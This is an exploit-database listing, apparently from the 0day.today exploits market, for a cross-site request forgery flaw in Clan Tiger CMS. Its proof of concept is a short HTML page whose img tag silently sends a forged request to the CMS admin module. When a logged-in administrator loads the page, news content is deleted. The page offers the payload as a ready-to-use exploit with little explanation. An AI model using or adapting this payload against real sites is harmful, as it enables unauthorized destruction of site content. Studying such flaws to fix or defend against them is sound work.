[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Clain_TIger_CMS CSRF Vulnerability

Author
Pratul Agrawal
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9673
Category
web applications
Date add
16-03-2010
Platform
unsorted
==================================
Clain_TIger_CMS CSRF Vulnerability
==================================

  # Vulnerability found in- Admin module
   
  # email         Pratulag@yahoo.com
   
  # company       aksitservices
   
  # Credit by     Pratul Agrawal
 
  # Software      Clan Tiger_CMS

  # Category  	  CMS / Portals
  
  # Site p4ge     http://server/clantiger/index.php?module=login
  
  # Plateform     php

  # Greetz to     Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
  
   
   
  #  Proof of concept   #
 
  Targeted URL:  http://servername/clantiger/
  
 
   Script to Delete the News content through Cross Site request forgery
   
             .  ................................................................................................................
   
                        <html>
 
                          <body>
 
                              <img src=http://demo.opensourcecms.com/clantiger/clantiger/index.php?module=news&action=remove&id=[user ID] />
 
                          </body>
 
                        </html>
   
             .  ..................................................................................................................
   
   
   
  After execution refresh the page and u can see that a added content is deleted automatically.




#  0day.today [2024-11-14]  #